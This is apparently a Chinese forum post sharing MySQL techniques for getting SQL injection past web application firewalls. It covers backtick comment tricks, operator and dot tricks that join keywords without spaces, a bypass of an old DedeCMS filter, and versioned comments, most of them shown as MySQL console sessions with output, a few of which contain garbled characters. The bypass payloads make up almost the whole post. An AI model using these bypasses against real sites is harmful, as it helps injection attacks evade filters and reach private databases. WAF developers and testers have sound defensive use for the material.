研究過國內外的waf。分享一些?奇淫絕技。
一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造輪子。
Mysql
過空格和一些正則。
mysql> select`version`()
-> ;
+----------------------+
| `version`() |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)
一個更好玩的技巧,這個`控制符可以當注釋符用(限定條件)。
mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)
usage : where ?id ='0'`'xxxxcomment on.
mysql> select id from qs_admins;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)
mysql> select+id-1+1.from qs_admins;
+----------+
| +id-1+1. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)
mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)
(有些人不是一直在說關鍵字怎么過?過濾一個from ... ? ?就是這樣連起來過)
mysql> select@^1.from qs_admins;
+------|+
| @^1. |
+------|+
| NULL |
+------|+
這個是bypass ?曾經dedeCMS filter .
或者這樣也是ok.
mysql> select-count(id)test from qs_admins;
+------|+
| test |
+------|+
| -1 |
+------|+
1 row in set (0.00 sec)
mysql> /\*!40000select\*/ id from qs_admins;
+----+
| id |
+----+
| ?1 |
+----+
1 row in set (0.00 sec)
先分享這么多,哈。